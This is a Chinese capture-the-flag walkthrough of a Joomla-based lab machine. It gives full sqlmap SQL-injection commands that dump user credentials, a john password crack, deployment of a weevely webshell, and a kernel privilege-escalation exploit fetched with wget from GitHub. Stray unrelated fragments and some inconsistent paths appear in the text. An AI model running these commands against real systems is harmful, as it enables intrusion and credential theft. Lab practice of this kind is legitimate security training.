信息搜集
My Diary 2024
首先我们做一个简单的信息搜集,使用的工具:
arp-scan
whatweb
nmap
Wappalyzer
joomscan
这里我们模拟一下,这个场景,其实相当于我们扫描内网中的主机,然后针对存活主机进行检测,发现这是一个网站。
我们首先用到arp-scan来扫描内网存活主机
arp-scan -l
其实这里我们在windows环境中可以使用arp -an来检测存活主机
arp -an
这里我们确定一下目标机器ip是192.168.119.158
那么我们就可以进行扫描端口的操作。
使用工具nmap进行扫描
我这里扫描一个端口号和系统信息
nmap -O -p- IP
这里可以发现开启了80端口,可以知道这个是一个网站了,我们访问这个网站
我们继续对这个网站进行一下信息搜集
网站指纹的识别我们可以使用nmap,使用-A参数即可
或者使用whatweb来识别
其实实战中whatweb比较拉跨,比较新的cms很难识别出来,可以选择一些在线的比如云悉,潮汐(http://finger.tidesec.net/)等等,云悉有点脑残就是了。
根据信息搜集
Mid-Autumn
Festival
寻找相关漏洞
废话结束,我们知道了这个cms类型之后,有专门针对这个cms的工具,kali中没有可以自行安装一下就好了。
joomscan工具
joomscan --url http://192.168.119.158
扫描之后我们发现了对应的版本号和他的后台
既然知道了版本号那么我们就来搜索一下这个版本有什么漏洞没有
searchsploit joomla 3.7.0
这里我们尝试使用第一个sql的漏洞,我们找到位置
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
这里加粗下划线的位置是固定的,具体位置我们可以看后面的path,拼接到这个固定位置后面就可以了
这里告诉我们要用sqlmap,同时也将使用语句给我们了,我们直接复制出来u使用
sqlmap -u "http://192.168.119.158/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
当然IP地址记得换,过程中一律选择y就好了
我们按照顺序来就好了
sqlmap -u "http://192.168.119.158/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
这里的表我们当然是爆破users表了,这里有一个点,就是这里的表名前面都有一个#,这个会注释掉sqlmap后面的语句,我们需要使用引号括起来。
sqlmap -u "http://192.168.119.158/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]
最后会出来
我们选择名字和密码这两个字段
sqlmap -u "http://192.168.119.158/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password --dump -p list[fullordering]
这里是一段加密之后的密码,我们将其保存到txt文件中,然后使用john进行破解
john pass.txt
发现密码为snoopy
我们利用之前发现后台进行登录。
后台利用
Mid-Autumn Festival
这个后台的漏洞点在模板的编辑页面,这里允许我们进行php文件的编辑
这里我们选择一个模板进入
我这里选择第一个,我们可以添加一个新的页面,就在这个模板文件的根目录
我们只需要设置一个php就好了
这里我们测试一下phpinfo页面
保存即可
这个网站的保存路径就是
http://192.168.119.158/templates/beez3/php.php
其实上面我们也能看到,就是多了个s
访问成功,这里我们使用另一个工具来生成一个shell
weevely generate 11 webshell.php
weevely generate 密码 文件名
这个工具可以生成一个webshell
当然你有自己的写的也可以
我们将这一段一句话木马写进去
然后我们使用工具进行连接
weevely http://192.168.119.158/template/beez3/a.php 111
这里我们可以直接使用这个工具来连接就好了
提权
但是这里我们权限过低,我们来看看这个系统内核的版本
内核版本是16.04,我们查询一下这个版本有没有什么漏洞
这里我们使用39772这个内核漏洞利用方式
我这里利用weevely进行了msf的上线,操作方式就是上传msf木马运行上线,然后后面的操作我们就利用
msf进行操作,可以先美化一下msf的shell界面
python -c 'import pty;pty.spawn("/bin/bash")'
然后我们通过上面的给的漏洞,这里他原本的下载地址已经没有了,换到了下面这个地址,我们可以直接在目标机器中下载
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
我们解压之后进入到文件夹内,其实这里面用的到的是exploit.tar
我们解压之后再解压这个
然后我们按照漏洞使用方式,依次运行下面两个命令
./compile.sh
./doubleput
最后我们到根目录中root下查看flag即可
总结:
本次实验的学习点
1、查询内核的版本,并找到相关漏洞进行利用
2、joomlaCMS的漏洞查找利用
3、weevely一句话木马生成和利用工具
原文始发于微信公众号(白安全组):DC全解,从信息搜集到提权上线
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论